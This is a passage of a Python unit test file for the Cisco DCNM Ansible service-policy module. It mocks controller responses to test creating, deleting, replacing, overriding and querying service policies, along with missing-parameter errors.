| 0
| 0
| 0
|
0
| 7
|
df1804ab1e1e75435f1c7f51e3986ca00b0880f3
| 86,782
|
py
|
Python
|
tests/unit/modules/dcnm/test_dcnm_service_policy.py
|
CiscoDevNet/ansible-dcnm
|
1fa025085342d7d57fc4588471504d3089bd296f
|
[
"Apache-2.0"
] | 28
|
2020-07-19T02:56:38.000Z
|
2022-03-03T01:28:10.000Z
|
tests/unit/modules/dcnm/test_dcnm_service_policy.py
|
CiscoDevNet/ansible-dcnm
|
1fa025085342d7d57fc4588471504d3089bd296f
|
[
"Apache-2.0"
] | 67
|
2020-07-17T21:49:00.000Z
|
2022-03-20T14:59:23.000Z
|
tests/unit/modules/dcnm/test_dcnm_service_policy.py
|
CiscoDevNet/ansible-dcnm
|
1fa025085342d7d57fc4588471504d3089bd296f
|
[
"Apache-2.0"
] | 18
|
2020-07-07T14:42:22.000Z
|
2022-03-09T12:31:13.000Z
|
#!/usr/bin/python
#
# Copyright (c) 2020 Cisco and/or its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.ansible.netcommon.tests.unit.compat.mock import patch
from ansible_collections.cisco.dcnm.plugins.modules import dcnm_service_policy
from .dcnm_module import TestDcnmModule, set_module_args, loadPlaybookData
import json, copy
class TestDcnmServicePolicyModule(TestDcnmModule):
module = dcnm_service_policy
fd = None
def init_data(self):
    """Reset the lazily-opened unit-test log handle (see log_msg)."""
    self.fd = None
def log_msg(self, msg):
    """Write msg to the debug log, opening sp-ut.log on first use."""
    if self.fd is None:
        self.fd = open("sp-ut.log", "w+")
    self.fd.write(msg)
def setUp(self):
    """Install transport mocks before each test.

    dcnm_send is patched so load_sp_fixtures can feed canned controller
    responses back via side_effect; dcnm_reset_connection is patched so no
    real session handling runs. Both patches are stopped in tearDown.
    """
    super(TestDcnmServicePolicyModule, self).setUp()
    self.mock_dcnm_send = patch('ansible_collections.cisco.dcnm.plugins.modules.dcnm_service_policy.dcnm_send')
    self.run_dcnm_send = self.mock_dcnm_send.start()
    self.mock_dcnm_reset_connection = patch('ansible_collections.cisco.dcnm.plugins.modules.dcnm_service_policy.dcnm_reset_connection')
    self.run_dcnm_reset_connection = self.mock_dcnm_reset_connection.start()
def tearDown(self):
    """Undo setUp: stop every mock patch so later tests see the real functions."""
    super(TestDcnmServicePolicyModule, self).tearDown()
    for active_patch in (self.mock_dcnm_send, self.mock_dcnm_reset_connection):
        active_patch.stop()
#################################### FIXTURES ############################
def load_sp_fixtures(self):
    """Program self.run_dcnm_send.side_effect for the current test case.

    The original implementation was a ~550-line chain of non-exclusive
    ``if`` blocks with duplicated lookups, dead locals and stray ``pass``
    statements; it is replaced here by a data table. Each entry lists, in
    call order, the DCNM responses the mocked dcnm_send should return for
    one test: either a key into ``self.payloads_data`` or ``_EMPTY`` (an
    empty response, ``[]``). Tests absent from the table (e.g. check-mode
    and update-existing) leave the mock untouched, exactly as before.
    """
    _EMPTY = None  # sentinel: the mocked call returns []
    fixture_table = {
        'test_dcnm_sp_merged_new': [
            'get_snt1_response', 'get_snt2_response', 'get_snt2_response',
            _EMPTY, _EMPTY, _EMPTY,
            'create_sp1_resp', 'create_sp2_resp', 'create_sp3_resp',
            'deploy_sp1_resp', 'deploy_sp2_sp3_resp',
            'get_sn1_att_status', 'get_sn2_att_status', 'get_sn2_att_status',
        ],
        'test_dcnm_sp_merged_new_no_opt_elems': [
            'get_snt1_response', 'get_snt2_response',
            _EMPTY, _EMPTY,
            'create_sp1_resp', 'create_sp2_resp',
            'deploy_sp1_resp', 'deploy_sp2_sp3_resp',
            'get_sn1_att_status', 'get_sn2_att_status',
        ],
        'test_dcnm_sp_merged_existing_no_opt_elems': [
            'get_snt1_response', 'get_snt2_response',
            'get_sp1_resp', 'get_sp2_resp',
            'get_sn1_att_status', 'get_sn2_att_status',
            'create_sp1_resp', 'create_sp2_resp',
            'deploy_sp1_resp', 'deploy_sp2_sp3_resp',
            'get_sn1_att_status', 'get_sn2_att_status',
        ],
        'test_dcnm_sp_merged_new_unauth_error': [
            'get_snt1_response', 'get_snt2_response',
            _EMPTY, _EMPTY,
            'resp_unauth_err', _EMPTY,
            'create_sp1_resp', 'create_sp2_resp',
            'deploy_sp1_resp', 'deploy_sp2_sp3_resp',
            'get_sn1_att_status', 'get_sn2_att_status',
        ],
        'test_dcnm_sp_config_without_state': [
            'get_snt1_response', 'get_snt2_response', 'get_snt2_response',
            _EMPTY, _EMPTY, _EMPTY,
            'create_sp1_resp', 'create_sp2_resp', 'create_sp3_resp',
            'deploy_sp1_resp', 'deploy_sp2_sp3_resp',
            'get_sn1_att_status', 'get_sn2_att_status', 'get_sn2_att_status',
        ],
        'test_dcnm_sp_merge_no_deploy': [
            'get_snt1_response', 'get_snt2_response', 'get_snt2_response',
            _EMPTY, _EMPTY, _EMPTY,
            'create_sp1_resp', 'create_sp2_resp', 'create_sp3_resp',
            'deploy_sp1_resp', 'deploy_sp2_sp3_resp',
            'get_sn1_att_status', 'get_sn2_att_status', 'get_sn2_att_status',
        ],
        'test_dcnm_sp_merge_deploy_false': [
            'get_snt1_response', 'get_snt2_response', 'get_snt2_response',
            _EMPTY, _EMPTY, _EMPTY,
            'create_sp1_resp', 'create_sp2_resp', 'create_sp3_resp',
        ],
        'test_dcnm_sp_merged_existing_and_non_existing': [
            'get_snt1_response', 'get_snt2_response', 'get_snt2_response',
            'get_sp1_resp', _EMPTY, _EMPTY,
            'get_sn1_att_status',
            'create_sp2_resp', 'create_sp3_resp',
            'deploy_sp2_sp3_resp',
            'get_sn2_att_status', 'get_sn2_att_status',
        ],
        'test_dcnm_sp_delete_existing_no_config': [
            'get_service_nodes_resp',
            'get_policy_with_sn1', 'get_policy_with_sn2',
            'detach_sp1_resp', 'detach_sp2_sp3_resp',
            'deploy_sp1_resp', 'deploy_sp2_sp3_resp',
            'get_dd_sn1_att_status', 'get_dd_sn2_att_status', 'get_dd_sn2_att_status',
            'delete_sp1_resp', 'delete_sp2_resp', 'delete_sp3_resp',
        ],
        'test_dcnm_sp_delete_existing_with_node_names': [
            'get_policy_with_sn1', 'get_policy_with_sn2',
            'detach_sp1_resp', 'detach_sp2_sp3_resp',
            'deploy_sp1_resp', 'deploy_sp2_sp3_resp',
            'get_dd_sn1_att_status', 'get_dd_sn2_att_status', 'get_dd_sn2_att_status',
            'delete_sp1_resp', 'delete_sp2_resp', 'delete_sp3_resp',
        ],
        'test_dcnm_sp_delete_existing_with_node_name_and_policy_name': [
            'get_sp1_resp', 'get_sp2_resp', 'get_sp3_resp',
            'detach_sp1_resp', 'detach_sp2_sp3_resp',
            'deploy_sp1_resp', 'deploy_sp2_sp3_resp',
            'get_dd_sn1_att_status', 'get_dd_sn2_att_status', 'get_dd_sn2_att_status',
            'delete_sp1_resp', 'delete_sp2_resp', 'delete_sp3_resp',
        ],
        'test_dcnm_sp_delete_existing_with_node_name_and_rp_name': [
            'get_policy_with_sn1', 'get_policy_with_sn2',
            'detach_sp1_resp', 'detach_sp2_sp3_resp',
            'deploy_sp1_resp', 'deploy_sp2_sp3_resp',
            'get_dd_sn1_att_status', 'get_dd_sn2_att_status',
            'delete_sp1_resp', 'delete_sp2_resp',
        ],
        'test_dcnm_sp_delete_existing_detach_unauth_err': [
            'get_sp1_resp', 'get_sp2_resp', 'get_sp3_resp',
            'resp_unauth_err', 'detach_sp1_resp', 'detach_sp2_sp3_resp',
            'deploy_sp1_resp', 'deploy_sp2_sp3_resp',
            'get_dd_sn1_att_status', 'get_dd_sn2_att_status', 'get_dd_sn2_att_status',
            'delete_sp1_resp', 'delete_sp2_resp', 'delete_sp3_resp',
        ],
        'test_dcnm_sp_delete_existing_delete_deploy_unauth_err': [
            'get_sp1_resp', 'get_sp2_resp', 'get_sp3_resp',
            'detach_sp1_resp', 'detach_sp2_sp3_resp',
            'resp_unauth_err', 'deploy_sp1_resp', 'deploy_sp2_sp3_resp',
            'get_dd_sn1_att_status', 'get_dd_sn2_att_status', 'get_dd_sn2_att_status',
            'delete_sp1_resp', 'delete_sp2_resp', 'delete_sp3_resp',
        ],
        'test_dcnm_sp_delete_existing_delete_unauth_err': [
            'get_sp1_resp', 'get_sp2_resp', 'get_sp3_resp',
            'detach_sp1_resp', 'detach_sp2_sp3_resp',
            'deploy_sp1_resp', 'deploy_sp2_sp3_resp',
            'get_dd_sn1_att_status', 'get_dd_sn2_att_status', 'get_dd_sn2_att_status',
            'resp_unauth_err', 'delete_sp1_resp', 'delete_sp2_resp', 'delete_sp3_resp',
        ],
        'test_dcnm_sp_delete_existing_and_non_existing': [
            _EMPTY, 'get_sp2_resp', 'get_sp3_resp',
            'detach_sp2_sp3_resp',
            'deploy_sp2_sp3_resp',
            'get_dd_sn2_att_status', 'get_dd_sn2_att_status',
            'delete_sp2_resp', 'delete_sp3_resp',
        ],
        'test_dcnm_sp_delete_non_existing': [_EMPTY] * 7,
        'test_dcnm_sp_replace_sp1_to_sp3_non_existing': [
            'get_snt1_response', 'get_snt2_response', 'get_snt2_response',
            _EMPTY, _EMPTY, _EMPTY,
            'resp_unauth_err', 'get_sp1_resp',
            'create_sp1_resp', 'create_sp2_resp', 'create_sp3_resp',
            'resp_unauth_err',
            'deploy_sp1_resp', 'deploy_sp2_sp3_resp',
            'get_sn1_att_status', 'get_sn2_att_status', 'get_sn2_att_status',
        ],
        'test_dcnm_sp_replace_sp1_to_sp3_existing': [
            'get_snt1_response', 'get_snt2_response', 'get_snt2_response',
            'get_sp1_resp', 'get_sp2_resp', 'get_sp3_resp',
            'get_sn1_att_status', 'get_sn2_att_status',
            'create_sp1_resp', 'create_sp2_resp', 'create_sp3_resp',
            'deploy_sp1_resp', 'deploy_sp2_sp3_resp',
            'get_sn1_att_status', 'get_sn2_att_status', 'get_sn2_att_status',
        ],
        'test_dcnm_sp_replace_sp1_to_sp3_existing_no_change': [
            'get_snt1_response', 'get_snt2_response', 'get_snt2_response',
            'get_sp1_resp', 'get_sp2_resp', 'get_sp3_resp',
            'get_sn1_att_status', 'get_sn2_att_status',
        ],
        'test_dcnm_sp_override_with_new_peerings': [
            'get_snt1_response',
            _EMPTY,
            'get_service_nodes_resp',
            'get_policy_with_sn1', 'get_policy_with_sn2',
            'create_sp1_resp',
            'detach_sp2_sp3_resp',
            'deploy_sp2_sp3_resp',
            'get_dd_sn2_att_status', 'get_dd_sn2_att_status',
            'delete_sp2_resp', 'delete_sp3_resp',
            'deploy_sp1_resp',
            'get_sn1_att_status',
        ],
        'test_dcnm_sp_override_with_existing_peering': [
            'get_snt1_response',
            'get_sp1_resp',
            'get_service_nodes_resp',
            'get_policy_with_sn1', 'get_policy_with_sn2',
            'get_sn1_att_status',
            'detach_sp2_sp3_resp',
            'deploy_sp2_sp3_resp',
            'get_dd_sn2_att_status', 'get_dd_sn2_att_status',
            'delete_sp2_resp', 'delete_sp3_resp',
        ],
        'test_dcnm_sp_override_with_existing_peering_updated': [
            'get_snt1_response',
            'get_sp1_resp',
            'get_service_nodes_resp',
            'get_policy_with_sn1', 'get_policy_with_sn2',
            'get_sn1_att_status',
            'create_sp1_resp',
            'detach_sp2_sp3_resp',
            'deploy_sp2_sp3_resp',
            'get_dd_sn2_att_status', 'get_dd_sn2_att_status',
            'delete_sp2_resp', 'delete_sp3_resp',
            'deploy_sp1_resp',
            'get_sn1_att_status',
        ],
        'test_dcnm_sp_override_with_no_config': [
            'get_service_nodes_resp',
            'get_policy_with_sn1', 'get_policy_with_sn2',
            'detach_sp1_resp', 'detach_sp2_sp3_resp',
            'deploy_sp1_resp', 'deploy_sp2_sp3_resp',
            'get_dd_sn1_att_status', 'get_dd_sn2_att_status', 'get_dd_sn2_att_status',
            'delete_sp1_resp', 'delete_sp2_resp', 'delete_sp3_resp',
        ],
        'test_dcnm_sp_query_non_existing': [_EMPTY] * 3,
        'test_dcnm_sp_query_with_service_node1': ['get_policy_with_sn1'],
        'test_dcnm_sp_query_with_service_node2': ['get_policy_with_sn2'],
        'test_dcnm_sp_query_existing_with_node_and_policy': [
            'get_sp1_resp', 'get_sp2_resp', 'get_sp3_resp',
        ],
    }
    sequence = fixture_table.get(self._testMethodName)
    if sequence is not None:
        self.run_dcnm_send.side_effect = [
            [] if key is _EMPTY else self.payloads_data.get(key)
            for key in sequence
        ]
def load_fixtures(self, response=None, device=''):
# Load service policy related side-effects
self.load_sp_fixtures ()
#################################### FIXTURES END ############################
#################################### TEST-CASES ##############################
def test_dcnm_sp_merged_new (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp3_config')
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 3)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 3)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_merged_new_no_opt_elems (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp2_no_opt_elems')
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 2)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 2)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_merged_new_unauth_error (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp2_no_opt_elems')
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 2)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 2)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_merged_existing_no_opt_elems (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp2_no_opt_elems')
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 2)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 2)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_merged_new_check_mode (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp3_config')
set_module_args(dict(state='merged',
attach=True,
deploy=True,
_ansible_check_mode=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 3)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 3)
def test_dcnm_sp_config_without_state (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp3_config')
set_module_args(dict(attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 3)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 3)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_merge_no_deploy (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp3_config')
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 3)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 3)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_merge_deploy_false (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp3_config')
set_module_args(dict(state='merged',
attach=True,
deploy=False,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 3)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_wrong_state(self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp7_config')
set_module_args(dict(state='wrong_state',
attach=True,
deploy=False,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = None
try:
result = self.execute_module(changed=False, failed=False)
except:
self.assertEqual (result, None)
def test_dcnm_sp_merge_no_mand_elems (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_policy_no_mand_elems')
## No dest_port
cfg = copy.deepcopy(self.playbook_config)
cfg[0]["policy"].pop("dest_port")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('dest_port : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No src_port
cfg = copy.deepcopy(self.playbook_config)
cfg[0]["policy"].pop("src_port")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('src_port : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No proto
cfg = copy.deepcopy(self.playbook_config)
cfg[0]["policy"].pop("proto")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('proto : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No next hop
cfg = copy.deepcopy(self.playbook_config)
cfg[0].pop("next_hop")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('next_hop : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No dest_network
cfg = copy.deepcopy(self.playbook_config)
cfg[0].pop("dest_network")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('dest_network : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No src_network
cfg = copy.deepcopy(self.playbook_config)
cfg[0].pop("src_network")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('src_network : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No dst_vrf
cfg = copy.deepcopy(self.playbook_config)
cfg[0].pop("dest_vrf")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('dest_vrf : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No src_vrf
cfg = copy.deepcopy(self.playbook_config)
cfg[0].pop("src_vrf")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('src_vrf : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No RP name
cfg = copy.deepcopy(self.playbook_config)
cfg[0].pop("rp_name")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('rp_name : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No policy name
cfg = copy.deepcopy(self.playbook_config)
cfg[0].pop("name")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('name : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No node name object
cfg = copy.deepcopy(self.playbook_config)
cfg[0].pop("node_name")
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('node_name : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
def test_dcnm_sp_merged_existing_and_non_existing (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp3_config')
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 2)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 2)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_existing_no_config (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_no_config')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 3)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_existing_with_node_names (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_with_node_names')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 3)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_existing_with_node_name_and_policy_name (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_with_name_and_node_name')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 3)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_existing_with_node_name_and_rp_name (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_with_node_name_and_rp_name')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 2)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_existing_detach_unauth_err (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_with_name_and_node_name')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 3)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_existing_delete_deploy_unauth_err (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_with_name_and_node_name')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 3)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_existing_delete_unauth_err (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
